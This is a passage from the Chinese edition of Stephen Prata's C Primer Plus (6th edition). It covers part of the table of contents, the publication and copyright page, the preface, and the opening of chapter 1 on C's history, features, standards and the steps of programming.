6.1.2 C风格读取循环 6.2 while语句 6.2.1 终止while循环 6.2.2 何时终止循环 6.2.3 while:入口条件循环 6.2.4 语法要点 6.3 用关系运算符和表达式比较大小 6.3.1 什么是真 6.3.2 其他真值 6.3.3 真值的问题 6.3.4 新的_Bool类型 6.3.5 优先级和关系运算符 6.4 不确定循环和计数循环 6.5 for循环 6 6.6 其他赋值运算符:+=、-=、*=、/=、%= 6.7 逗号运算符 6.8 出口条件循环:do while 6.9 如何选择循环 6.10 嵌套循环 6.10.1 程序分析 6.10.2 嵌套变式 6.11 数组简介 6.12 使用函数返回值的循环示例 6.12.1 程序分析 6.12.2 使用带返回值的函数 6.13 关键概念 6.14 本章小结 6.15 复习题 6.16 编程练习 第7章 C控制语句:分支和跳转 7.1 if语句 7.2 if else语句 7.2.1 另一个示例:介绍getchar()和putchar() 7.2.2 ctype.h系列的字符函数 7.2.3 多重选择else if 7.2.4 else与if配对 7.2.5 多层嵌套的if语句 7.3 逻辑运算符 7.3.1 备选拼写:iso646.h头文件 7.3.2 优先级 7.3.3 求值顺序 7.3.4 范围 7.4 一个统计单词的程序 7.5 条件运算符:?: 7.6 循环辅助:continue和break 7.6.1 continue语句 7.6.2 break语句 7 7.7 多重选择:switch和break 7.7.1 switch语句 7.7.2 只读每行的首字符 7.7.3 多重标签 7.7.4 switch和if else 7.8 goto语句 7.9 关键概念 7.10 本章小结 7.11 复习题 7.12 编程练习 第8章 字符输入/输出和输入验证 8.1 单字符I/O:getchar()和putchar() 8.2 缓冲区 8.3 结束键盘输入 8.3.1 文件、流和键盘输入 8.3.2 文件结尾 8.4 重定向和文件 8.5 创建更友好的用户界面 8.5.1 使用缓冲输入 8.5.2 混合数值和字符输入 8.6 输入验证 8.6.1 分析程序 8.6.2 输入流和数字 8.7 菜单浏览 8.7.1 任务 8.7.2 使执行更顺利 8.7.3 混合字符和数值输入 8.8 关键概念 8.9 本章小结 8.10 复习题 8.11 编程练习 第9章 函数 9.1 复习函数 8 9.1.1 创建并使用简单函数 9.1.2 分析程序 9.1.3 函数参数 9.1.4 定义带形式参数的函数 9.1.5 声明带形式参数函数的原型 9.1.6 调用带实际参数的函数 9.1.7 黑盒视角 9.1.8 使用return从函数中返回值 9.1.9 函数类型 9.2 ANSI C函数原型 9.2.1 问题所在 9.2.2 ANSI的解决方案 9.2.3 无参数和未指定参数 9.2.4 函数原型的优点 9.3 递归 9.3.1 演示递归 9.3.2 递归的基本原理 9.3.3 尾递归 9.3.4 递归和倒序计算 9.3.5 递归的优缺点 9.4 编译多源代码文件的程序 9.4.1 UNIX 9.4.2 Linux 9.4.3 DOS命令行编译器 9.4.4 Windows和苹果的IDE编译器 9.4.5 使用头文件 9.5 查找地址:&运算符 9.6 更改主调函数中的变量 9.7 指针简介 9.7.1 间接运算符:* 9.7.2 声明指针 9.7.3 使用指针在函数间通信 9.8 关键概念 9 9.9 本章小结 9.10 复习题 9.11 编程练习 第10章 数组和指针 10.1 数组 10.1.1 初始化数组 10.1.2 指定初始化器(C99) 10.1.3 给数组元素赋值 10.1.4 数组边界 10.1.5 指定数组的大小 10.2 多维数组 10.2.1 初始化二维数组 10.2.2 其他多维数组 10.3 指针和数组 10.4 函数、数组和指针 10.4.1 使用指针形参 10.4.2 指针表示法和数组表示法 10.5 指针操作 10.6 保护数组中的数据 10.6.1 对形式参数使用const 10.6.2 const的其他内容 10.7 指针和多维数组 10.7.1 指向多维数组的指针 10.7.2 指针的兼容性 10.7.3 函数和多维数组 10.8 变长数组(VLA) 10.9 复合字面量 10.10 关键概念 10.11 本章小结 10.12 复习题 10.13 编程练习 第11章 字符串和字符串函数 11.1 表示字符串和字符串I/O 10 11.1.1 在程序中定义字符串 11.1.2 指针和字符串 11.2 字符串输入 11.2.1 分配空间 11.2.2 不幸的gets()函数 11.2.3 gets()的替代品 11.2.4 scanf()函数 11.3 字符串输出 11.3.1 puts()函数 11.3.2 fputs()函数 11.3.3 printf()函数 11.4 自定义输入/输出函数 11.5 字符串函数 11.5.1 strlen()函数 11.5.2 strcat()函数 11.5.3 strncat()函数 11.5.4 strcmp()函数 11.5.5 strcpy()和strncpy()函数 11.5.6 sprintf()函数 11.5.7 其他字符串函数 11.6 字符串示例:字符串排序 11.6.1 排序指针而非字符串 11.6.2 选择排序算法 11.7 ctype.h字符函数和字符串 11.8 命令行参数 11.8.1 集成环境中的命令行参数 11.8.2 Macintosh中的命令行参数 11.9 把字符串转换为数字 11.10 关键概念 11.11 本章小结 11.12 复习题 11.13 编程练习 第12章 存储类别、链接和内存管理 11 12.1 存储类别 12.1.1 作用域 12.1.2 链接 12.1.3 存储期 12.1.4 自动变量 12.1.5 寄存器变量 12.1.6 块作用域的静态变量 12.1.7 外部链接的静态变量 12.1.8 内部链接的静态变量 12.1.9 多文件 12.1.10 存储类别说明符 12.1.11 存储类别和函数 12.1.12 存储类别的选择 12.2 随机数函数和静态变量 12.3 掷骰子 12.4 分配内存:malloc()和free() 12.4.1 free()的重要性 12.4.2 calloc()函数 12.4.3 动态内存分配和变长数组 12.4.4 存储类别和动态内存分配 12.5 ANSI C类型限定符 12.5.1 const类型限定符 12.5.2 volatile类型限定符 12.5.3 restrict类型限定符 12.5.4 _Atomic类型限定符(C11) 12.5.5 旧关键字的新位置 12.6 关键概念 12.7 本章小结 12.8 复习题 12.9 编程练习 第13章 文件输入/输出 13.1 与文件进行通信 13.1.1 文件是什么 12 13.1.2 文本模式和二进制模式 13.1.3 I/O的级别 13.1.4 标准文件 13.2 标准I/O 13.2.1 检查命令行参数 13.2.2 fopen()函数 13.2.3 getc()和putc()函数 13.2.4 文件结尾 13.2.5 fclose()函数 13.2.6 指向标准文件的指针 13.3 一个简单的文件压缩程序 13.4 文件I/O:fprintf()、fscanf()、fgets()和fputs() 13.4.1 fprintf()和fscanf()函数 13.4.2 fgets()和fputs()函数 13.5 随机访问:fseek()和ftell() 13.5.1 fseek()和ftell()的工作原理 13.5.2 二进制模式和文本模式 13.5.3 可移植性 13.5.4 fgetpos()和fsetpos()函数 13.6 标准I/O的机理 13.7 其他标准I/O函数 13.7.1 int ungetc(int c, FILE *fp)函数 13.7.2 int fflush()函数 13.7.3 int setvbuf()函数 13.7.4 二进制I/O:fread()和fwrite() 13.7.5 size_t fwrite()函数 13.7.6 size_t fread()函数 13.7.7 int feof(FILE *fp)和int ferror(FILE *fp)函数 13.7.8 一个程序示例 13.7.9 用二进制I/O进行随机访问 13.8 关键概念 13.9 本章小结 13.10 复习题 13 13.11 编程练习 第14章 结构和其他数据形式 14.1 示例问题:创建图书目录 14.2 建立结构声明 14.3 定义结构变量 14.3.1 初始化结构 14.3.2 访问结构成员 14.3.3 结构的初始化器 14.4 结构数组 14.4.1 声明结构数组 14.4.2 标识结构数组的成员 14.4.3 程序讨论 14.5 嵌套结构 14.6 指向结构的指针 14.6.1 声明和初始化结构指针 14.6.2 用指针访问成员 14.7 向函数传递结构的信息 14.7.1 传递结构成员 14.7.2 传递结构的地址 14.7.3 传递结构 14.7.4 其他结构特性 14.7.5 结构和结构指针的选择 14.7.6 结构中的字符数组和字符指针 14.7.7 结构、指针和malloc() 14.7.8 复合字面量和结构(C99) 14.7.9 伸缩型数组成员(C99) 14.7.10 匿名结构(C11) 14.7.11 使用结构数组的函数 14.8 把结构内容保存到文件中 14.8.1 保存结构的程序示例 14.8.2 程序要点 14.9 链式结构 14.10 联合简介 14 14.10.1 使用联合 14.10.2 匿名联合(C11) 14.11 枚举类型 14.11.1 enum常量 14.11.2 默认值 14.11.3 赋值 14.11.4 enum的用法 14.11.5 共享名称空间 14.12 typedef简介 14.13 其他复杂的声明 14.14 函数和指针 14.15 关键概念 14.16 本章小结 14.17 复习题 14.18 编程练习 第15章 位操作 15.1 二进制数、位和字节 15.1.1 二进制整数 15.1.2 有符号整数 15.1.3 二进制浮点数 15.2 其他进制数 15.2.1 八进制 15.2.2 十六进制 15.3 C按位运算符 15.3.1 按位逻辑运算符 15.3.2 用法:掩码 15.3.3 用法:打开位(设置位) 15.3.4 用法:关闭位(清空位) 15.3.5 用法:切换位 15.3.6 用法:检查位的值 15.3.7 移位运算符 15.3.8 编程示例 15.3.9 另一个例子 15 15.4 位字段 15.4.1 位字段示例 15.4.2 位字段和按位运算符 15.5 对齐特性(C11) 15.6 关键概念 15.7 本章小结 15.8 复习题 15.9 编程练习 第16章 C预处理器和C库 16.1 翻译程序的第一步 16.2 明示常量:#define 16.2.1 记号 16.2.2 重定义常量 16.3 在#define中使用参数 16.3.1 用宏参数创建字符串:#运算符 16.3.2 预处理器黏合剂:##运算符 16.3.3 变参宏:...和_ _VA_ARGS_ _ 16.4 宏和函数的选择 16.5 文件包含:#include 16.5.1 头文件示例 16.5.2 使用头文件 16.6 其他指令 16.6.1 #undef指令 16.6.2 从C预处理器角度看已定义 16.6.3 条件编译 16.6.4 预定义宏 16.6.5 #line和#error 16.6.6 #pragma 16.6.7 泛型选择(C11) 16.7 内联函数(C99) 16.8 _Noreturn函数(C11) 16.9 C库 16.9.1 访问C库 16 16.9.2 使用库描述 16.10 数学库 16.10.1 三角问题 16.10.2 类型变体 16.10.3 tgmath.h库(C99) 16.11 通用工具库 16.11.1 exit()和atexit()函数 16.11.2 qsort()函数 16.12 断言库 16.12.1 assert的用法 16.12.2 _Static_assert(C11) 16.13 string.h库中的memcpy()和memmove() 16.14 可变参数:stdarg.h 16.15 关键概念 16.16 本章小结 16.17 复习题 16.18 编程练习 第17章高级数据表示 17.1 研究数据表示 17.2 从数组到链表 17.2.1 使用链表 17.2.2 反思 17.3 抽象数据类型(ADT) 17.3.1 建立抽象 17.3.2 建立接口 17.3.3 使用接口 17.3.4 实现接口 17.4 队列ADT 17.4.1 定义队列抽象数据类型 17.4.2 定义一个接口 17.4.3 实现接口数据表示 17.4.4 测试队列 17.5 用队列进行模拟 17 17.6 链表和数组 17.7 二叉查找树 17.7.1 二叉树ADT 17.7.2 二叉查找树接口 17.7.3 二叉树的实现 17.7.4 使用二叉树 17.7.5 树的思想 17.8 其他说明 17.9 关键概念 17.10 本章小结 17.11 复习题 17.12 编程练习 附录A 复习题答案 附录B 参考资料 B.1 参考资料I:补充阅读 B.2 参考资料II:C运算符 B.3 参考资料III:基本类型和存储类别 B.4 参考资料IV:表达式、语句和程序流 B.5 参考资料V:新增C99和C11的ANSI C库 B.6 参考资料VI:扩展的整数类型 B.7 参考资料VII:扩展字符支持 B.8 参考资料VIII:C99/C11数值计算增强 B.9 参考资料IX:C和C++的区别 18 PEARSON CPrimer Plus(第6版)中文版 [美]Stephen Prata 著 姜佑 译 人民邮电出版社 北京 19 图书在版编目(CIP)数据 C Primer Plus(第6版)中文版/(美)普拉达(Prata,S.)著;姜佑译.-- 北京:人民邮电出版社,2016.4 ISBN 978-7-115-39059-2 Ⅰ.①C… Ⅱ.①普…②姜… Ⅲ.①C语言—程序设计 Ⅳ.①TP312 中国版本图书馆CIP数据核字(2015)第084602号 版权声明 Authorized translation from the English language edition,entitled C Primer Plus(sixth edition),9780321928429 by Stephen Prata,published by Pearson Education,Inc.,publishing as Addison-Wesley,Copyright©2014 Pearson Education,Inc. All rights reserved.No part of this book may be reproduced or transmitted in any form or by any means,electronic or mechanical,including photocopying,recording or by any information storage retrieval system,without permission from Pearson Education Inc.CHINESE SIMPLIFIED language edition published by PEARSON EDUCATION ASIA LTD.,and POSTS & TELECOMMUNICATIONS PRESS Copyright©2015. 本书封面贴有Pearson Education(培生教育出版集团)激光防伪标 签。无标签者不得销售。 ◆著 [美]Stephen Prata 译 姜佑 责任编辑 傅道坤 责任印制 张佳莹 焦志炜 20 ◆人民邮电出版社出版发行  北京市丰台区成寿寺路11号 邮编 100164  电子邮件 315@ptpress.com.cn 网址 http://www.ptpress.com.cn 北京圣夫亚美印刷有限公司印刷 ◆开本:787×1092 1/16 印张:47 字数:1412千字  2016年4月第1版 印数:1-8000册  2016年4月北京第1次印刷 著作权合同登记号 图字:01-2014-5617号 定价:89.00元 读者服务热线:(010)81055410 印装质量热线:(010)81055316 反盗版热线:(010)81055315 21 内容提要 本书详细讲解了C语言的基本概念和编程技巧。 全书共17章。第1章、第2章介绍了C语言编程的预备知识。第3章~第 15章详细讲解了C语言的相关知识,包括数据类型、格式化输入/输出、运算 符、表达式、语句、循环、字符输入和输出、函数、数组和指针、字符和字 符串函数、内存管理、文件输入输出、结构、位操作等。第16章、第17章介 绍C预处理器、C库和高级数据表示。本书以完整的程序为例,讲解C语言的 知识要点和注意事项。每章末尾设计了大量复习题和编程练习,帮助读者巩 固所学知识和提高实际编程能力。附录给出了各章复习题的参考答案和丰富 的参考资料。 本书可作为C语言的教材,适用于需要系统学习C语言的初学者,也适 用于巩固C语言知识或希望进一步提高编程技术的程序员。 22 作者简介 Stephen Prata曾在加利福尼亚的马林学院(肯特菲尔德)教授天文学、 物理学和程序设计课程,现已退休。他在加州理工学院获得学士学位,在加 州大学伯克利分校获得博士学位。他最早接触程序设计,是为了利用计算机 给星团建模。Stephen撰写和与他人合著了十几本图书,其中包括C++Primer Plus和UNIX Primer Plus。 献辞 谨将本书献给我的父亲William Prata。 致谢 感谢Pearson的Mark Taber一直都非常关注本书。感谢Danny Kalev在技术 上提供的帮助和建议。 23 前言 1984年C Primer Plus第1版刚问世时,使用C语言编程的人并不多。C语 言从那时开始流行,许多人在本书的帮助下掌握了C语言。实际上,C Primer Plus各个版本累计销售量已超过55万册。 C语言从早期的非正式的K&R标准,发展到1990 ISO/ANSI标准,进而 发展到2011 ISO/IEC标准。本书也随着逐渐成熟,发展到现在的第 6 版。在 所有这些版本中,我的目标是致力于编写一本指导性强、条理清晰而且有用 的C语言教程。 本书的用法和目标 我希望撰写一本友好、方便使用、便于自学的指南。为此,本书采用以 下写作策略。 在介绍C语言细节的同时,讲解编程概念。本书假定读者为非专业的程 序员。 每次尽量用短小简单的示例演示一两个概念,学以致用是最有效的学习 方式之一。 当概念用文字较难解释时,则用图表演示以帮助读者理解。 C语言的主要特性总结在方框中,便于查找和复习。 每章末尾设有复习题和编程练习,帮助读者测试和加深对C语言的理 解。 为了获得最佳的学习效果,学习本书时,读者应尽量扮演一个积极的角 色。不仅要仔细阅读程序示例,还要亲自动手录入程序并运行。C 是一种可 移植性很高的语言,但有时在你的系统中运行的结果和在我们的系统中运行 的结果不同。经常改动程序的某些部分,运行后看看有什么效果。偶尔出现 24 警告也不必理会,主要是看一下执行错误操作会出现什么状况。在学习的过 程中应该多提出问题和多练习。用得越多,学的知识就越牢固。 希望本书能帮助读者轻松愉快地学习C语言。 25 第1章 初识C语言 本章介绍以下内容: C的历史和特性 编写程序的步骤 编译器和链接器的一些知识 C标准 欢迎来到C语言的世界。C是一门功能强大的专业化编程语言,深受业 余编程爱好者和专业程序员的喜爱。本章为读者学习这一强大而流行的语言 打好基础,并介绍几种开发C程序最可能使用的环境。 我们先来了解C语言的起源和一些特性,包括它的优缺点。然后,介绍 编程的起源并探讨一些编程的基本原则。最后,讨论如何在一些常见系统中 运行C程序。 26 1.1 C语言的起源 1972年,贝尔实验室的丹尼斯·里奇(Dennis Ritch)和肯·汤普逊(Ken Thompson)在开发UNIX操作系统时设计了C语言。然而,C语言不完全是里 奇突发奇想而来,他是在B语言(汤普逊发明)的基础上进行设计。至于 B 语言的起源,那是另一个故事。C 语言设计的初衷是将其作为程序员使用的 一种编程工具,因此,其主要目标是成为有用的语言。 虽然绝大多数语言都以实用为目标,但是通常也会考虑其他方面。例 如,Pascal 的主要目标是为更好地学习编程原理提供扎实的基础;而BASIC 的主要目标是开发出类似英文的语言,让不熟悉计算机的学生轻松学习编 程。这些目标固然很重要,但是随着计算机的迅猛发展,它们已经不是主流 语言。然而,最初为程序员设计开发的C语言,现在已成为首选的编程语言 之一。 27 1.2 选择C语言的理由 在过去40多年里,C语言已成为最重要、最流行的编程语言之一。它的 成长归功于使用过的人都对它很满意。过去20多年里,虽然许多人都从C语 言转而使用其他编程语言(如,C++、Objective C、Java等),但是C语言仍 凭借自身实力在众多语言中脱颖而出。在学习C语言的过程中,会发现它的 许多优点(见图1.1)。下面,我们来看看其中较为突出的几点。 1.2.1 设计特性 C是一门流行的语言,融合了计算机科学理论和实践的控制特性。C语 言的设计理念让用户能轻松地完成自顶向下的规划、结构化编程和模块化设 计。因此,用C语言编写的程序更易懂、更可靠。 1.2.2 高效性 C是高效的语言。在设计上,它充分利用了当前计算机的优势,因此 C 程序相对更紧凑,而且运行速度很快。实际上,C 语言具有通常是汇编语言 才具有的微调控制能力(汇编语言是为特殊的中央处理单元设计的一系列内 部指令,使用助记符来表示;不同的 CPU 系列使用不同的汇编语言),可 以根据具体情况微调程序以获得最大运行速度或最有效地使用内存。 28 图1.1 C语言的优点 1.2.3 可移植性 C是可移植的语言。这意味着,在一种系统中编写的 C程序稍作修改或 不修改就能在其他系统运行。如需修改,也只需简单更改主程序头文件中的 少许项即可。大部分语言都希望成为可移植语言,但是,如果经历过把IBM PC BASIC程序转换成苹果BASIC(两者是近亲),或者在UNIX系统中运行 IBM大型机的FORTRAN程序的人都知道,移植是最麻烦的事。C语言是可移 植方面的佼佼者。从8位微处理器到克雷超级计算机,许多计算机体系结构 29 都可以使用C编译器(C编译器是把C代码转换成计算机内部指令的程序)。 但是要注意,程序中针对特殊硬件设备(如,显示监视器)或操作系统特殊 功能(如,Windows 8或OS X)编写的部分,通常是不可移植的。 由于C语言与UNIX关系密切,UNIX系统通常会将C编译器作为软件包的 一部分。安装Linux时,通常也会安装C编译器。供个人计算机使用的C编译 器很多,运行各种版本的Windows和Macintosh(即, Mac)的PC都能找到 合适的C编译器。因此,无论是使用家庭计算机、专业工作站,还是大型 机,都能找到针对特定系统的C编译器。 1.2.4 强大而灵活 C语言功能强大且灵活(计算机领域经常使用这两个词)。例如,功能 强大且灵活的UNIX操作系统,大部分是用C语言写的;其他语言(如, FORTRAN、Perl、Python、Pascal、LISP、Logo、BASIC)的许多编译器和 解释器都是用C语言编写的。因此,在UNIX机上使用FORTRAN时,最终是 由C程序生成最后的可执行程序。C程序可以用于解决物理学和工程学的问 题,甚至可用于制作电影的动画特效。 1.2.5 面向程序员 C 语言是为了满足程序员的需求而设计的,程序员利用 C 可以访问硬 件、操控内存中的位。C 语言有丰富的运算符,能让程序员简洁地表达自己 的意图。C没有Pascal严谨,但是却比C++的限制多。这样的灵活性既是优点 也是缺点。优点是,许多任务用C来处理都非常简洁(如,转换数据的格 式);缺点是,你可能会犯一些莫名其妙的错误,这些错误不可能在其他语 言中出现。C 语言在提供更多自由的同时,也让使用者承担了更大的责任。 另外,大多数C实现都有一个大型的库,包含众多有用的C函数。这些 函数用于处理程序员经常需要解决的问题。 1.2.6 缺点 30 人无完人,金无足赤。C语言也有一些缺点。例如,前面提到的,要享 受用C语言自由编程的乐趣,就必须承担更多的责任。特别是,C语言使用 指针,而涉及指针的编程错误往往难以察觉。有句话说的好:想拥有自由就 必须时刻保持警惕。 C 语言紧凑简洁,结合了大量的运算符。正因如此,我们也可以编写出 让人极其费解的代码。虽然没必要强迫自己编写晦涩的代码,但是有兴趣写 写也无妨。试问,除 C语言外还为哪种语言举办过年度混乱代码大赛[1]? 瑕不掩瑜,C语言的优点比缺点多很多。我们不想在这里多费笔墨,还 是来聊聊C语言的其他话题。 31 1.3 C语言的应用范围 早在20世纪80年代,C语言就已经成为小型计算机(UNIX系统)使用的 主流语言。从那以后,C语言的应用范围扩展到微型机(个人计算机)和大 型机(庞然大物)。如图1.2所示,许多软件公司都用C语言来开发文字处理 程序、电子表格、编译器和其他产品,因为用 C语言编写的程序紧凑而高 效。更重要的是,C程序很方便修改,而且移植到新型号的计算机中也没什 么问题。 无论是软件公司、经验丰富的C程序员,还是其他用户,都能从C语言 中受益。越来越多的计算机用户已转而求助C语言解决一些安全问题。不一 定非得是计算机专家也能使用C语言。 20世纪90年代,许多软件公司开始改用C++来开发大型的编程项目。 C++在C语言的基础上嫁接了面向对象编程工具(面向对象编程是一门哲 学,它通过对语言建模来适应问题,而不是对问题建模以适应语言)。 C++几乎是C的超集,这意味着任何C程序差不多就是一个C++程序。学习C 语言,也相当于学习了许多C++的知识。 32 图1.2 C语言的应用范围 虽然这些年来C++和JAVA非常流行,但是C语言仍是软件业中的核心技 能。在最想具备的技能中,C语言通常位居前十。特别是,C 语言已成为嵌 入式系统编程的流行语言。也就是说,越来越多的汽车、照相机、DVD 播 放机和其他现代化设备的微处理器都用 C 语言进行编程。除此之外,C 语 言还从长期被FORTRAN独占的科学编程领域分得一杯羹。最终,作为开发 操作系统的卓越语言,C在Linux开发中扮演着极其重要的角色。因此,在进 入21世纪的第2个10年中,C语言仍然保持着强劲的势头。 简而言之,C 语言是最重要的编程语言之一,将来也是如此。如果你想 33 拿下一份编程的工作,被问到是否会C语言时,最好回答“是”。 34 1.4 计算机能做什么 在学习如何用C语言编程之前,最好先了解一下计算机的工作原理。这 些知识有助于你理解用C语言编写程序和运行C程序时所发生的事情之间有 什么联系。 现代的计算机由多种部件构成。中央处理单元(CPU)承担绝大部分的 运算工作。随机存取内存(RAM)是存储程序和文件的工作区;而永久内 存存储设备(过去一般指机械硬盘,现在还包括固态硬盘)即使在关闭计算 机后,也不会丢失之前储存的程序和文件。另外,还有各种外围设备(如, 键盘、鼠标、触摸屏、监视器)提供人与计算机之间的交互。CPU负责处理 程序,接下来我们重点讨论它的工作原理。 CPU 的工作非常简单,至少从以下简短的描述中看是这样。它从内存 中获取并执行一条指令,然后再从内存中获取并执行下一条指令,诸如此类 (一个吉赫兹的CPU一秒钟能重复这样的操作大约十亿次,因此,CPU 能以 惊人的速度从事枯燥的工作)。CPU 有自己的小工作区——由若干个寄存 器组成,每个寄存器都可以储存一个数字。一个寄存器储存下一条指令的内 存地址,CPU 使用该地址来获取和更新下一条指令。在获取指令后,CPU在 另一个寄存器中储存该指令,并更新第1个寄存器储存下一条指令的地址。 CPU能理解的指令有限(这些指令的集合叫作指令集)。而且,这些指令相 当具体,其中的许多指令都是用于请求计算机把一个数字从一个位置移动到 另一个位置。例如,从内存移动到寄存器。 下面介绍两个有趣的知识。其一,储存在计算机中的所有内容都是数 字。计算机以数字形式储存数字和字符(如,在文本文档中使用的字母)。 每个字符都有一个数字码。计算机载入寄存器的指令也以数字形式储存,指 令集中的每条指令都有一个数字码。其二,计算机程序最终必须以数字指令 码(即,机器语言)来表示。 简而言之,计算机的工作原理是:如果希望计算机做某些事,就必须为 其提供特殊的指令列表(程序),确切地告诉计算机要做的事以及如何做。 35 你必须用计算机能直接明白的语言(机器语言)创建程序。这是一项繁琐、 乏味、费力的任务。计算机要完成诸如两数相加这样简单的事,就得分成类 似以下几个步骤。 1.从内存位置2000上把一个数字拷贝到寄存器1。 2.从内存位置2004上把另一个数字拷贝到寄存器2。 3.把寄存器2中的内容与寄存器1中的内容相加,把结果储存在寄存器1 中。 4.把寄存器1中的内容拷贝到内存位置2008。 而你要做的是,必须用数字码来表示以上的每个步骤! 如果以这种方式编写程序很合你的意,那不得不说抱歉,因为用机器语 言编程的黄金时代已一去不复返。但是,如果你对有趣的事情比较感兴趣, 不妨试试高级编程语言。 36 1.5 高级计算机语言和编译器 高级编程语言(如,C)以多种方式简化了编程工作。首先,不必用数 字码表示指令;其次,使用的指令更贴近你如何想这个问题,而不是类似计 算机那样繁琐的步骤。使用高级编程语言,可以在更抽象的层面表达你的想 法,不用考虑CPU在完成任务时具体需要哪些步骤。例如,对于两数相加, 可以这样写: total = mine + yours; 对我们而言,光看这行代码就知道要计算机做什么;而看用机器语言写 成的等价指令(多条以数字码形式表现的指令)则费劲得多。但是,对计算 机而言却恰恰相反。在计算机看来,高级指令就是一堆无法理解的无用数 据。编译器在这里派上了用场。编译器是把高级语言程序翻译成计算机能理 解的机器语言指令集的程序。程序员进行高级思维活动,而编译器则负责处 理冗长乏味的细节工作。 编译器还有一个优势。一般而言,不同CPU制造商使用的指令系统和编 码格式不同。例如,用Intel Core i7 (英特尔酷睿i7)CPU编写的机器语言程 序对于ARM Cortex-A57 CPU而言什么都不是。但是,可以找到与特定类型 CPU匹配的编译器。因此,使用合适的编译器或编译器集,便可把一种高级 语言程序转换成供各种不同类型 CPU 使用的机器语言程序。一旦解决了一 个编程问题,便可让编译器集翻译成不同 CPU 使用的机器语言。 简而言之,高级语言(如C、Java、Pascal)以更抽象的方式描述行 为,不受限于特定CPU或指令集。而且,高级语言简单易学,用高级语言编 程比用机器语言编程容易得多。 1964年,控制数据公司(Control Data Corporation)研制出了CDC 6600 计算机。这台庞然大物是世界上首台超级计算机,当时的售价是600万美 元。它是高能核物理研究的首选。然而,现在的普通智能手机在计算能力和 内存方面都超过它数百倍,而且能看视频,放音乐。 37 1964 年,在工程和科学领域的主流编程语言是 FORTRAN。虽然编程语 言不如硬件发展那么突飞猛进,但是也发生了很大变化。为了应对越来越大 型的编程项目,语言先后为结构化编程和面向对象编程提供了更多的支持。 随着时间的推移,不仅新语言层出不穷,而且现有语言也会发生变化。 38 1.6 语言标准 目前,有许多C实现可用。在理想情况下,编写C程序时,假设该程序 中未使用机器特定的编程技术,那么它的运行情况在任何实现中都应该相 同。要在实践中做到这一点,不同的实现要遵循同一个标准。 C语言发展之初,并没有所谓的C标准。1987年,布莱恩·柯林汉(Brian Kernighan)和丹尼斯·里奇(Dennis Ritchie)合著的The C Programming Language(《C语言程序设计》)第1版是公认的C标准,通常称之为K&R C 或经典C。特别是,该书中的附录中的“C语言参考手册”已成为实现C的指导 标准。例如,编译器都声称提供完整的K&R实现。虽然这本书中的附录定 义了C语言,但却没有定义C库。与大多数语言不同的是,C语言比其他语言 更依赖库,因此需要一个标准库。实际上,由于缺乏官方标准,UNIX实现 提供的库已成为了标准库。 1.6.1 第1个ANSI/ISO C标准 随着C的不断发展,越来越广泛地应用于更多系统中,C社区意识到需 要一个更全面、更新颖、更严格的标准。鉴于此,美国国家标准协会 (ANSI)于 1983 年组建了一个委员会(X3J11),开发了一套新标准,并 于1989年正式公布。该标准(ANSI C)定义了C语言和C标准库。国际标准 化组织于1990年采用了这套C标准(ISO C)。ISO C和ANSI C是完全相同的 标准。ANSI/ISO标准的最终版本通常叫作C89(因为ANSI于1989年批准该标 准)或C90(因为ISO于1990年批准该标准)。另外,由于ANSI先公布C标 准,因此业界人士通常使用ANSI C。 在该委员会制定的指导原则中,最有趣的可能是:保持 C的精神。委员 会在表述这一精神时列出了以下几点: 信任程序员; 不要妨碍程序员做需要做的事; 39 保持语言精练简单; 只提供一种方法执行一项操作; 让程序运行更快,即使不能保证其可移植性。 在最后一点上,标准委员会的用意是:作为实现,应该针对目标计算机 来定义最合适的某特定操作,而不是强加一个抽象、统一的定义。在学习C 语言过程中,许多方面都反映了这一哲学思想。 1.6.2 C99标准 1994年,ANSI/ISO联合委员会(C9X委员会)开始修订C标准,最终发 布了C99标准。该委员会遵循了最初C90标准的原则,包括保持语言的精练 简单。委员会的用意不是在C语言中添加新特性,而是为了达到新的目标。 第1个目标是,支持国际化编程。例如,提供多种方法处理国际字符集。第2 个目标是,“调整现有实践致力于解决明显的缺陷”。因此,在遇到需要将C 移至64位处理器时,委员会根据现实生活中处理问题的经验来添加标准。第 3个目标是,为适应科学和工程项目中的关键数值计算,提高C的适应性, 让C比FORTRAN更有竞争力。 这3点(国际化、弥补缺陷和提高计算的实用性)是主要的修订目标。 在其他方面的改变则更为保守,例如,尽量与C90、C++兼容,让语言在概 念上保持简单。用委员会的话说:“„„委员会很满意让C++成为大型、功能 强大的语言”。 C99的修订保留了C语言的精髓,C仍是一门简洁高效的语言。本书指出 了许多C99修改的地方。虽然该标准已发布了很长时间,但并非所有的编译 器都完全实现C99的所有改动。因此,你可能发现C99的一些改动在自己的 系统中不可用,或者只有改变编译器的设置才可用。 1.6.3 C11标准 维护标准任重道远。标准委员会在2007年承诺C标准的下一个版本是 40 C1X,2011年终于发布了C11标准。此次,委员会提出了一些新的指导原 则。出于对当前编程安全的担忧,不那么强调“信任程序员”目标了。而且, 供应商并未像对C90那样很好地接受和支持C99。这使得C99的一些特性成为 C11的可选项。因为委员会认为,不应要求服务小型机市场的供应商支持其 目标环境中用不到的特性。另外需要强调的是,修订标准的原因不是因为原 标准不能用,而是需要跟进新的技术。例如,新标准添加了可选项支持当前 使用多处理器的计算机。对于C11标准,我们浅尝辄止,深入分析这部分内 容已超出本书讨论的范围。 注意 本书使用术语ANSI C、ISO C或ANSI/ISO C讲解C89/90和较新标准共有 的特性,用C99或C11介绍新的特性。有时也使用C90(例如,讨论一个特性 被首次加入C语言时)。 41 1.7 使用C语言的7个步骤 C是编译型语言。如果之前使用过编译型语言(如,Pascal或 FORTRAN),就会很熟悉组建C程序的几个基本步骤。但是,如果以前使 用的是解释型语言(如,BASIC)或面向图形界面语言(如,Visual Basic),或者甚至没接触过任何编程语言,就有必要学习如何编译。别担 心,这并不复杂。首先,为了让读者对编程有大概的了解,我们把编写C程 序的过程分解成7个步骤(见图1.3)。注意,这是理想状态。在实际的使用 过程中,尤其是在较大型的项目中,可能要做一些重复的工作,根据下一个 步骤的情况来调整或改进上一个步骤。 图1.3 编程的7个步骤 1.7.1 第1步:定义程序的目标 42 在动手写程序之前,要在脑中有清晰的思路。想要程序去做什么首先自 己要明确自己想做什么,思考你的程序需要哪些信息,要进行哪些计算和控 制,以及程序应该要报告什么信息。在这一步骤中,不涉及具体的计算机语 言,应该用一般术语来描述问题。 1.7.2 第2步:设计程序 对程序应该完成什么任务有概念性的认识后,就应该考虑如何用程序来 完成它。例如,用户界面应该是怎样的?如何组织程序?目标用户是谁?准 备花多长时间来完成这个程序? 除此之外,还要决定在程序(还可能是辅助文件)中如何表示数据,以 及用什么方法处理数据。学习C语言之初,遇到的问题都很简单,没什么可 